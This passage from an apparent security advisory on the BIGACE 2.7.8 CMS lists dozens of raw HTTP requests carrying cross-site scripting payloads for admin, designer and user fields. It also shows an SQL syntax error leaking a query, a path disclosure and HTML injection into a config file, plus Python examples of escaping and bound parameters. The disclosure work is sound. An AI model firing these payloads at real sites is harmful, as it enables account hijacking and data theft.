POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
10. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---
11. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---
12. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=categoryCreate_tADMIN_len&data[parent]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---
13. xss and dom-based xss
---< request >---
GET /bigace/public/index.php?cmd=application&id=-1_timages_len&browserMode=listing&jsFunc='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---
14. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------60191211818685
Content-Length: 1500
-----------------------------60191211818685
Content-Disposition: form-data; name="mode"
upload
-----------------------------60191211818685
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain
sialala;]
-----------------------------60191211818685
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------60191211818685
Content-Disposition: form-data; name="data[name]"
-----------------------------60191211818685
Content-Disposition: form-data; name="data[unique_name]"
-----------------------------60191211818685
Content-Disposition: form-data; name="data[description]"
-----------------------------60191211818685
Content-Disposition: form-data; name="data[langid]"
"><script>alert(43)</script><
-----------------------------60191211818685
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------60191211818685--
---< request >---
15. xss + information disclosure
---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode="%20body%20onload%3d"alert(4321)"%3e
---< request >---
Response:
<div id="darkBackground">
<form name="" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len" method="POST">
<a href="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len&mode=" body onload="alert(4321)">"><img src="http://10.149.14.52/bigace/public/system/style/standard/refresh.png" border="0" align="top" alt="RELOAD" /></a> <select name="mode" onChange="this.form.submit()">
<option value="index">Statistics Info</option>
<option value="last7">Last Seven Daily Averages</option>
<option value="os">OS Information</option>
<option value="browser">Browser Information</option>
<option value="bots">Search Engines</option>
<option value="visitors">Top Visitors</option>
<option value="references">Top References</option>
<option value="byYear">By Year</option>
<option value="byUrl">By URL</option>
</select>
<noscript><button type="submit">Show</button></noscript></form>
</div>
<h3 class="error">Requested Mode does not exist: " body onload="alert(4321)"><br>/var/www/bigace/system/admin/plugins/includes/statistics/.php</h3><div align="center" class="CopyrightFooter"><span class="copyright">Powered by <a href="http://www.bigace.de/" target="_blank">BIGACE 2.7.8</a>. All rights reserved. <br />© 2002-2013 <a href="http://www.kevinpapst.de/" target="_blank">Kevin Papst</a><br /></span></div>
<!-- $Id: AdminContentFooter.tpl.html,v 1.2 2009/02/28 00:43:33 kpapst Exp $ -->
16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"
upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"
"><script>alert(/x/)</script>
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------7318133896418--
---< request >---
17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"
upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"
'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------7318133896418--
---< request >---
18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"
upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"
'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------7318133896418--
---< request >---
19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D=cze%3b]%3c%2fscript%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bcatchwords%5D=asdasd&data%5Bdescription%5D=asdasd
---< request >---
20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=menuAttributes_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=6&data%5Bid%5D=-1&data%5Blangid%5D=en&data%5Bparentid%5D=-9999&data%5Bunique_name%5D=index_en.html&data%5Bname%5D=Home&data%5Bcatchwords%5D=BIGACE+WEB+CMS&data%5Bdescription%5D=Menu+TOP-LEVEL&data%5Btext_4%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0
---< request >---
III. For 'designer' user logged-in:
1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenu_tADMIN_len&data[id]=-1&adminCharset='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data[langid]=en&mode=changeattrib HTTP/1.1
Host: 10.149.14.52
Connection: close
---< request >---
2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=createNewMenu&data%5BnextAdmin%5D=menuAttributes&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=asd&data%5Bcatchwords%5D=asd&data%5Bdescription%5D=asd&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=PublishingWorkflow&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---
3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=design_tADMIN_len&mode=update&hashtoken=0cbbd0bec2522717655d2458877c750b HTTP/1.1
Host: 10.149.14.52
Content-Length: 214
designName=BIGACE-REDIRECT&description=Redirects+to+the+URL+in+the+Menus+Catchwords.&template=REDIRECT&stylesheet=dummy_stylesheet&portletColumns='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&contents=asd
---< request >---
IV. For admin logged-in:
1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len&data[id]=-1&data[nextAdmin]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---
Response:
<form name="MenuValues" onSubmit="return checkCreateForm();" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len" method="POST">
<input type="hidden" name="mode" value="createNewMenu">
<input type="hidden" name="data[nextAdmin]" value="'>"><img/src="x"/onerror="alert(4321)">">
2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------309932421512500
Content-Length: 1022
-----------------------------309932421512500
Content-Disposition: form-data; name="mode"
upload
-----------------------------309932421512500
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream
-----------------------------309932421512500
Content-Disposition: form-data; name="data[parentid]"
a"><script>alert(1)</script>
-----------------------------309932421512500
Content-Disposition: form-data; name="data[name]"
aaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[unique_name]"
aaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[description]"
aaaaaaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------309932421512500
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------309932421512500--
---< request >---
3. the same request, with parameter data[name] (xss too)
4. the same for parameters data[unique_name] and data[description].
For data[description], to reproduce it you must break out of the <textarea> tag, so
the payload should be similar to this one:
</textarea><script>alert(2)</script>
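The textarea break-out above is a matter of output context: the same value is safe or not depending on where the template puts it. As an added example (not BIGACE's code), the following Python renders a hypothetical stand-in for the upload form both raw and through html.escape, then tokenises the result the way a browser would, to show which version lets the reported data[parentid] and data[description] values create new elements.

```python
import html
from html.parser import HTMLParser

# Constructed sample submission: the field names are the ones the advisory's
# mediaUpload requests use, and the values are the payloads it reports for
# data[parentid] (attribute context) and data[description] (textarea body).
FIELDS = {
    "data[parentid]": 'a"><script>alert(1)</script>',
    "data[name]": "aaaaaaaaaaaaa",
    "data[description]": "</textarea><script>alert(2)</script>",
}

# Hypothetical stand-in for the re-displayed upload form; not BIGACE's template.
FORM_TEMPLATE = (
    '<form method="POST">\n'
    '<input type="hidden" name="data[parentid]" value="{parentid}">\n'
    '<input type="text" name="data[name]" value="{name}">\n'
    '<textarea name="data[description]">{description}</textarea>\n'
    "</form>"
)


def render_naive(fields):
    """Echo the submitted values straight back into the markup (no encoding)."""
    return FORM_TEMPLATE.format(
        parentid=fields["data[parentid]"],
        name=fields["data[name]"],
        description=fields["data[description]"],
    )


def render_escaped(fields):
    """Same form, but every value goes through html.escape(quote=True).

    Encoding " and ' keeps a value inside the attribute it was written into;
    encoding < and > is what stops '</textarea>' from closing the element,
    which is the break-out the advisory describes for data[description].
    """
    e = {k: html.escape(v, quote=True) for k, v in fields.items()}
    return FORM_TEMPLATE.format(
        parentid=e["data[parentid]"],
        name=e["data[name]"],
        description=e["data[description]"],
    )


class FormParser(HTMLParser):
    """Tokenises the markup the way a browser would: collects every start tag
    and the decoded value of each named input / textarea."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.values = {}
        self._textarea = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        a = dict(attrs)
        if tag == "input" and "name" in a:
            self.values[a["name"]] = a.get("value") or ""
        elif tag == "textarea":
            self._textarea = a.get("name")
            self.values[self._textarea] = ""

    def handle_data(self, data):
        if self._textarea is not None:
            self.values[self._textarea] += data

    def handle_endtag(self, tag):
        if tag == "textarea":
            self._textarea = None


def _parse(markup):
    p = FormParser()
    p.feed(markup)
    p.close()
    return p


def injected_tags(markup, expected=("form", "input", "textarea")):
    """Start tags that are not part of the intended form, e.g. ['script']."""
    return [t for t in _parse(markup).tags if t not in expected]


def recovered_values(markup):
    """Field values as the browser decodes them; with correct escaping these
    equal the original submission, so escaping loses no data."""
    return _parse(markup).values


if __name__ == "__main__":
    print("naive  :", injected_tags(render_naive(FIELDS)))
    print("escaped:", injected_tags(render_escaped(FIELDS)))
```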
5. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=createNewMenu&data%5BnextAdmin%5D=itemMenu&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=aaaaaaaaaaaa&data%5Bcatchwords%5D=aaaaaaaaaaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaa&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---
6. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------47528326907
Content-Length: 1420
-----------------------------47528326907
Content-Disposition: form-data; name="mode"
upload
-----------------------------47528326907
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain
sialala;]
-----------------------------47528326907
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------47528326907
Content-Disposition: form-data; name="data[name]"
-----------------------------47528326907
Content-Disposition: form-data; name="data[unique_name]"
-----------------------------47528326907
Content-Disposition: form-data; name="data[description]"
-----------------------------47528326907
Content-Disposition: form-data; name="data[langid]"
"><script>alert(3)</script>
-----------------------------47528326907
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------47528326907--
---< request >---
7. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D="><script>alert(9)</script>&data%5Bcatchwords%5D=aaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaaaaaaaaaaaa
---< request >---
8. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len&mode=addToGroup HTTP/1.1
Host: 10.149.14.52
data%5Bid%5D=3&data%5Bgroup%5D=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e
---< request >---
9. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
10. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
11. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
12. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
13. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1048
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
"><script>alert(234)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
14. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
15. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---
17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---
18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------12326531612573
Content-Length: 1039
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
"><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1045
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
"><script>alert(3)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1053
-----------------------------12326531612573
Content-Disposition: form-data; name="mode"
importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"
-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"
asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"
namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"
asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"
"></textarea><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"
en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"
-1
-----------------------------12326531612573--
---< request >---
21. SQL Injection
<td valign="top">MySQL error (1064:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'x"/onerror="alert(4321)">'' at
line 1) for [SELECT count(id) as amount FROM cms_item_future WHERE itemtype='1' AND
id='-1' AND cid='1' AND language=''>"><img/src="x"/onerror="alert(4321)">'
;]
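The error text above shows the request's language value concatenated straight into the statement, which is why an XSS probe turned into a SQL syntax error. As an added example, not BIGACE's code, the following Python rebuilds that query over an in-memory sqlite3 table (a constructed stand-in for MySQL and cms_item_future) and contrasts string interpolation with a bound parameter.

```python
import sqlite3

# The value the advisory shows spliced into the language='...' condition
# (decoded from the request behind item 21).
PAGE_PAYLOAD = "'>\"><img/src=\"x\"/onerror=\"alert(4321)\">"


def make_db():
    """In-memory stand-in for cms_item_future. The column names come from the
    query in the MySQL error on the page; the rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE cms_item_future (itemtype TEXT, id TEXT, cid TEXT, language TEXT)"
    )
    conn.executemany(
        "INSERT INTO cms_item_future VALUES (?, ?, ?, ?)",
        [("1", "-1", "1", "en"), ("1", "-1", "1", "en"), ("1", "-1", "1", "de")],
    )
    conn.commit()
    return conn


def count_future_unsafe(conn, language):
    """The pattern the error text implies: the request value is concatenated
    into the statement. Returns the count, or the database's error message
    when the value breaks the statement (the failure item 21 shows)."""
    sql = (
        "SELECT count(id) AS amount FROM cms_item_future "
        f"WHERE itemtype='1' AND id='-1' AND cid='1' AND language='{language}'"
    )
    try:
        return conn.execute(sql).fetchone()[0]
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"


def count_future_safe(conn, language):
    """Same query with a bound parameter: the value can never become SQL
    syntax, so quotes, angle brackets or an apostrophe in a legitimate value
    (a language named d'oc) are compared as data and cannot error."""
    sql = (
        "SELECT count(id) AS amount FROM cms_item_future "
        "WHERE itemtype='1' AND id='-1' AND cid='1' AND language=?"
    )
    return conn.execute(sql, (language,)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    for value in ("en", "d'oc", PAGE_PAYLOAD):
        print(repr(value))
        print("  interpolated:", count_future_unsafe(db, value))
        print("  bound       :", count_future_safe(db, value))
```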
22. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52
start='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&amount=10&namespace=&level=
---< request >---
23. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52
start=1560&amount="%20body%20onload%3d"alert(4321)"%3e&namespace=&level=
---< request >---
24. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=community_tADMIN_len HTTP/1.1
Host: 10.149.14.52
s4lv09G4d=j6dbng376&o8F5hJ39y='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&kjhgzt87D=asd
---< request >---
25. xss + info disclosure
---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len
Cookie: PHPSESSID=d0mbv9u7103sdm3350bi0gepv0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
mode='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX
---< request >---
26. adding a new community
When you're adding a new community, you can write directly to the file
consumer.ini. This can crash your site.
root@bt:/var/www/bigace# grep -n -r -e aaaaaaaa ./
./system/config/consumer.ini:9:[aaaaaaaaaaa]
In this case, I changed the 'aaaa' string to HTML code to check if the page
would show it (as HTML, not as text). HTML injection is possible here.
27. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
28. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---
29. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52
